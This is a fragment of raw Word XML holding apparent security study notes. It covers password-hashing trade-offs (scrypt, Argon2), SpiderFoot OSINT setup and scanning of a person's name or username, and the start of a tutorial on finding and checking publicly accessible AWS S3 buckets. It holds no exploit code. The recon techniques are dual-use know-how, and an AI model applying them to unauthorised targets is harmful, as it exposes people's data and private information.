    </w:p>
    <w:p w14:paraId="1ADAA266" w14:textId="0430C3AD" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF7107" w14:textId="19F88F0D" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cost for both time and memory-bound to one parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296F235C" w14:textId="4220CB96" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>too new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F2144" w14:textId="20A7A214" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Argon2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A01A6C7" w14:textId="38419E4C" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>similar to bcrypt and scrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862A7A5" w14:textId="66A61047" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>memory and CPU cost parameters + parallelization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB5F9E" w14:textId="5B908587" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F6249" w14:textId="3D0175E8" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cost for memory and time controlled separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F907CD" w14:textId="2EEFF8BA" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>two versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4725C7F8" w14:textId="50134748" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA27452" w14:textId="3EED2A30" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>even newer than scrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78487C" w14:textId="7EBF7F61" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Advice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386A5ED" w14:textId="2D045692" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>never reuse password you care about</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A79F595" w14:textId="3E53754E" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>don’t update unnecessarily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C80974" w14:textId="2A93BC7B" w:rsidR="00933F10" w:rsidRDefault="000B1DD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>don’t use back up secret questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B292BB" w14:textId="2A1437B4" w:rsidR="000B1DD6" w:rsidRDefault="000B1DD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use 2FA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC2587" w14:textId="13EE1D69" w:rsidR="00523090" w:rsidRDefault="00523090" w:rsidP="00D416B8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="146D57F4" w14:textId="4FE400A4" w:rsidR="00D416B8" w:rsidRDefault="00EB767A" w:rsidP="00D416B8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OSINT – Spiderfoot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6144A5" w14:textId="0D59628F" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21988E01" w14:textId="2234BDC7" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>download spiderfoot git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52166FEC" w14:textId="3BB1F918" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo pip3 install requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ADD5BA" w14:textId="1E75DAA6" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo python3 sf.py -l 127.0.0.1:5001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A51D9A3" w14:textId="1DBB262A" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>localhost:5001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB3DD12" w14:textId="74B0E3FF" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4127A85F" w14:textId="5FF3A059" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>New Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B5F9C" w14:textId="6725E43F" w:rsidR="00030D17" w:rsidRDefault="00030D17" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Scan Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49408501" w14:textId="56CF2A1D" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Scan Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648F71F9" w14:textId="343B60BB" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Type in name or username in quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DA35D9" w14:textId="2598EB36" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>By Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768447C3" w14:textId="3B844E58" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBE6C52" w14:textId="1FD0F312" w:rsidR="00EB767A" w:rsidRDefault="00EB767A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E09B82E" w14:textId="317F308E" w:rsidR="008843B1" w:rsidRDefault="008843B1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Wayback Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77768223" w14:textId="6B762EE6" w:rsidR="008843B1" w:rsidRDefault="008843B1" w:rsidP="008843B1">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3940B2DD" w14:textId="707192F7" w:rsidR="008843B1" w:rsidRDefault="00B00A24" w:rsidP="008843B1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AWS s3 Bucket Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4FF95" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Today we’ll look at insecure cloud storage, more specifically, insecure amazon web services(AWS) s3 buckets. Today, a lot more companies are moving their computing and infrastructure to the ‘cloud’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BDE6A0" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Scalable: Most cloud service providers have the ability to not only create a large amount of resources on demand but they can also automatically manage creation of these resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25454664" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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High availability: To ensure resources don’t go down, cloud providers allow companies to manage failover by duplicating resources in different regions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA41FE" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="37B29B0B" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>While there are a large number of cloud providers(Microsoft Azure, Oracle Cloud), we’ll focus on Amazon Web Services as they are fairly popular. AWS provides the ability for clients to store a lot of data using a service called Simple Storage Service(S3). Files are stored on what are called buckets and these buckets can have insecure permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2D2E1" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="5390F26E" w14:textId="710044E2" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">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66E06C9D" wp14:editId="0654745A">
            <wp:extent cx="5943600" cy="600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14:paraId="7AB146FD" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here’s a break down of the following permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFD60BA" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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List objects: user with permissions can list the files in the bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C74B37B" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Write objects: user with permissions can add/remove files on the bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241675E3" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Read bucket permissions: users with permissions can read files on the bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB55737" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Write bucket permissions: users with permissions can edit files on the bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF92FA" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="53164AEC" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The permissions above apply to the bucket, but an administrator can also assign specific permissions to files/objects in the bucket. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945323A" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="0EA4A388" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An administrator can assign permissions in the following ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D223E52" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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For specific users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BDA62F" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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For everyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579D1D1C" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="41729250" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In the past, the default S3 permissions were weak and S3 buckets would be publicly accessible but AWS changed this to block public access by default. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363EA6A" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="0B24DF2B" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Enumeration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2092355D" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="2415E1DD" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The first part of enumerating s3 buckets is having an s3 bucket name. How would you find an s3 bucket name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686B426" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Source code on git repositories </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B9FFFB" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Analysing requests on web pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E0280" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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Some pages retrieve static resources from s3 buckets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D29277" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Domain name of product names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634987EB" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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If a product or domain is called “servicename” then the s3 bucket may also be called “servicename”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0250D" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="15CA1807" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Once we have an s3 bucket, we can check if it’s publicly accessible by browsing to the URL. The format of the URL is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05086FC8" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucketname.s3.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB4F7B7" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="4C8FF9D4" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>We talked about AWS supporting multiple regions before. Even though S3 buckets are global, we can still access them on their region:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A700565" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucketname.region-name.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468BC331" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="7ACBFDEC" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If the bucket is not accessible, you would get a similar image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED93FBD" w14:textId="1B591B43" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
